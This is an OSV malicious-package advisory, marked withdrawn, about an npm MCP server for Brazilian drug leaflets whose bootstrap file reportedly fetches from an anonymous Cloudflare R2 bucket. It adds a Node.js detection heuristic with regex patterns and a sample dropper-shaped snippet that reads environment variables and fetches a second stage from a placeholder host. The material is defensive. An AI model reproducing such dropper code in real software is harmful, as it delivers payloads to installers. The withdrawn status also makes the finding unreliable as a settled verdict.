MAL-2026-4406

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@mcpassure/mcp-anvisa-bulario/MAL-2026-4406.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4406
Withdrawn
2026-05-26T18:22:54Z
Published
2026-05-20T00:39:56Z
Modified
2026-05-27T00:31:59.698295556Z
Summary
Malicious code in @mcpassure/mcp-anvisa-bulario (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e846cabb7b5077244737d7a465e944ebe7635db46cc55e7e5736eeda47d30938)

dist/bootstrap.js references a hardcoded URL on pub-046c52795b9445cd9f5cc5cb21b9d59f.r2.dev — an anonymous Cloudflare R2 bucket — and calls fetch() against it while reading process.env. This destination shape (a freshly provisioned, anonymous pub-*.r2.dev bucket holding executable payload bytes) matches the @chahuadev-style dropper infrastructure pattern: a mutable, publisher-unaffiliated host with no integrity verification, used to deliver second-stage code to installers. There is no legitimate reason for an ANVISA drug-information MCP server to retrieve code or data from an anonymous R2 bucket; the package's stated purpose (Brazilian medication bulário lookups) does not require any such asset. Combined with the env-var read adjacent to the fetch call, the structural signals are: (1) hardcoded non-publisher anonymous host, (2) no version pinning or hash verification, (3) purpose mismatch with package description, (4) environment-variable access in proximity to the outbound request. Treat as a payload-distribution dropper.
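As an added illustration of the four structural signals listed above (this is not part of the OSV record or of the amazon-inspector finding), the following Node.js script applies them as a static heuristic to the text of a package file: an anonymous pub-*.r2.dev URL, no integrity check near the download, a host outside the publisher's declared hosts, and a process.env read next to the outbound request. The proximity window, the allowlist argument and the sample inputs are assumptions made for the example; the bucket name in the samples is a placeholder, not the bucket cited in the finding.

```javascript
// Added example: heuristic static scan for the dropper signals described in the
// advisory text. Not the scanner used by amazon-inspector; thresholds are assumptions.

// Anonymous Cloudflare R2 public bucket URL: pub-<32 hex>.r2.dev (matches the
// shape of the host named in the finding; the id below is a placeholder).
const R2_URL = /https?:\/\/pub-[0-9a-f]{32}\.r2\.dev\/[^\s"'`)]*/gi;
// Tokens that suggest some integrity verification of downloaded bytes.
const INTEGRITY_RE = /\b(integrity|createHash|subtle\.digest|sha(256|384|512))\b/;
// Outbound request primitives considered for "proximity to the request".
const OUTBOUND_RE = /\bfetch\s*\(|\brequire\(["']https?["']\)|\bhttps?\.(get|request)\s*\(/;
// Characters on each side of the URL treated as "adjacent" (assumption).
const WINDOW = 400;

// Scan one file's source text. allowedHosts: hosts the publisher legitimately
// uses (e.g. derived from the package description/homepage); anything else is
// treated as a purpose mismatch.
function scanSource(path, text, allowedHosts = []) {
  const hits = [];
  R2_URL.lastIndex = 0;
  let m;
  while ((m = R2_URL.exec(text)) !== null) hits.push({ url: m[0], index: m.index });

  const signals = [];
  if (hits.length === 0) return { path, verdict: "clean", signals, urls: [] };

  // (1) hardcoded non-publisher anonymous host
  signals.push("hardcoded anonymous pub-*.r2.dev host");

  let missingIntegrity = false;
  let envNearRequest = false;
  let foreignHost = false;
  for (const { url, index } of hits) {
    const win = text.slice(Math.max(0, index - WINDOW), index + WINDOW);
    if (!INTEGRITY_RE.test(win)) missingIntegrity = true;
    if (OUTBOUND_RE.test(win) && /\bprocess\.env\b/.test(win)) envNearRequest = true;
    const host = new URL(url).hostname;
    if (!allowedHosts.includes(host)) foreignHost = true;
  }
  // (2) no version pinning or hash verification of the fetched bytes
  if (missingIntegrity) signals.push("no integrity verification near download");
  // (3) host not among the hosts the package's stated purpose would need
  if (foreignHost) signals.push("host not in publisher/purpose allowlist");
  // (4) environment-variable access adjacent to the outbound request
  if (envNearRequest) signals.push("process.env read adjacent to outbound request");

  const verdict = signals.length >= 3 ? "dropper-like" : "review";
  return { path, verdict, signals, urls: hits.map((h) => h.url) };
}

// Constructed samples (not package contents). The bucket id is all zeros.
const SAMPLE_DROPPER_SHAPE =
  'const base = "https://pub-00000000000000000000000000000000.r2.dev/stage2.bin";\n' +
  "const home = process.env.HOME;\n" +
  "fetch(base).then((r) => r.arrayBuffer());\n";

const SAMPLE_BENIGN =
  'const res = await fetch("https://consultas.anvisa.gov.br/api/consulta/bulario");\n' +
  "return res.json();\n";

const SAMPLE_VERIFIED =
  'const { createHash } = require("crypto");\n' +
  'const asset = "https://pub-00000000000000000000000000000000.r2.dev/data.json";\n' +
  "const body = await (await fetch(asset)).text();\n" +
  'if (createHash("sha256").update(body).digest("hex") !== EXPECTED) throw new Error("bad");\n';

if (typeof require !== "undefined" && require.main === module) {
  console.log(scanSource("dist/bootstrap.js", SAMPLE_DROPPER_SHAPE));
  console.log(scanSource("dist/index.js", SAMPLE_BENIGN));
  console.log(scanSource("dist/fetch.js", SAMPLE_VERIFIED,
    ["pub-00000000000000000000000000000000.r2.dev"]));
}
```

Run it over every .js file of an unpacked tarball and review anything that is not "clean"; the allowlist is what turns signal (3) from a guess into a per-package decision, so populate it from the package's own metadata rather than leaving it empty in production.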

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "2.1.7"
            ],
            "modified_time": "2026-05-20T00:39:56Z",
            "sha256": "2cb99eb86200644b4f108b751a41ac2fa4ac3c2996160eac58da8369d8be80b6",
            "id": "IN-MAL-2026-003322",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:25.41866891Z"
        },
        {
            "versions": [
                "2.1.6"
            ],
            "modified_time": "2026-05-20T00:47:34Z",
            "sha256": "e846cabb7b5077244737d7a465e944ebe7635db46cc55e7e5736eeda47d30938",
            "id": "IN-MAL-2026-003327",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:25.934749943Z"
        },
        {
            "versions": [
                "2.1.2"
            ],
            "modified_time": "2026-05-20T01:09:48Z",
            "sha256": "3be741993dd2133dfb8effe009f0d798f80ea44283059adc964d4c639a4d1b5c",
            "id": "IN-MAL-2026-003341",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:27.439539639Z"
        },
        {
            "versions": [
                "2.1.8"
            ],
            "modified_time": "2026-05-20T01:26:25Z",
            "sha256": "4783477f054bd24b84a903f7b8b66ff56f7752970bb0d362b0c117b03be62fdf",
            "id": "IN-MAL-2026-003358",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:29.371185279Z"
        },
        {
            "versions": [
                "2.1.1"
            ],
            "modified_time": "2026-05-20T01:32:29Z",
            "sha256": "b82c82ddf6a54b51ff773c550650233a2a05888aca35918911c2b277d1436c03",
            "id": "IN-MAL-2026-003364",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:29.942598689Z"
        },
        {
            "versions": [
                "2.1.4"
            ],
            "modified_time": "2026-05-20T01:13:46Z",
            "sha256": "5581b1fa309dcd3b41b45f5fc16c6abe59cfda373116e92fe137fb7bf772c3e5",
            "id": "IN-MAL-2026-003348",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:28.276930252Z"
        },
        {
            "versions": [
                "2.1.3"
            ],
            "modified_time": "2026-05-20T01:36:22Z",
            "sha256": "590355913700543ba116384af4aff83e5aefcadae860c2c3c6a4ba434b1f6872",
            "id": "IN-MAL-2026-003367",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:30.23231406Z"
        },
        {
            "versions": [
                "2.1.10"
            ],
            "modified_time": "2026-05-20T01:46:55Z",
            "sha256": "5f2f6e0a8441ee1e78d37fed1a981e6342ee276e8667b1ff0e1124bc3a0213f9",
            "id": "IN-MAL-2026-003381",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:32.101166995Z"
        },
        {
            "versions": [
                "2.1.5"
            ],
            "modified_time": "2026-05-20T01:20:56Z",
            "sha256": "cde284274517321fc712dc124b72622fc6cd4d1255851e1b9a49b5dbef8d9bbb",
            "id": "IN-MAL-2026-003355",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:29.007637114Z"
        },
        {
            "versions": [
                "2.1.9"
            ],
            "modified_time": "2026-05-20T01:07:25Z",
            "sha256": "e25c90fdc87c17cd388b917a0618ad5feb612becb07d01aa0bda5095b9116f8b",
            "id": "IN-MAL-2026-003339",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:27.242813193Z"
        }
    ]
}
References
Credits

Affected packages

npm / @mcpassure/mcp-anvisa-bulario

Package

Name
@mcpassure/mcp-anvisa-bulario
Purl
pkg:npm/%40mcpassure%2Fmcp-anvisa-bulario

Affected ranges

Affected versions

2.*
2.1.1
2.1.2
2.1.3
2.1.4
2.1.5
2.1.6
2.1.7
2.1.8
2.1.9
2.1.10

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@mcpassure/mcp-anvisa-bulario/MAL-2026-4406.json"
indicators
{
    "package_integrity": [
        {
            "filename": "mcp-anvisa-bulario-2.1.7.tgz",
            "hashes": {
                "sha512_sri": "sha512-mYwG5BgrOxJG/hBlrvX5qlFEHOYtrEk5WTeKXFcajgkw+WLv21tkQC4CKE881hWPdlAqNGqwy7MvX5sLDvdlKQ==",
                "sha1": "6ebf26c647815a38af4fa2d2d936ebc470ffc7ad"
            }
        }
    ],
    "evidence_files": [
        {
            "path": "dist/bootstrap.js",
            "tlsh": "219153865dfb1636016673e8072f900a36be4007355fcd40bf9d9390bf8906cda726ea",
            "sha256": "8e181b47d3a95b197eb68402402d3f93af33727c61c9c667cd982f459a14b9ad"
        }
    ]
}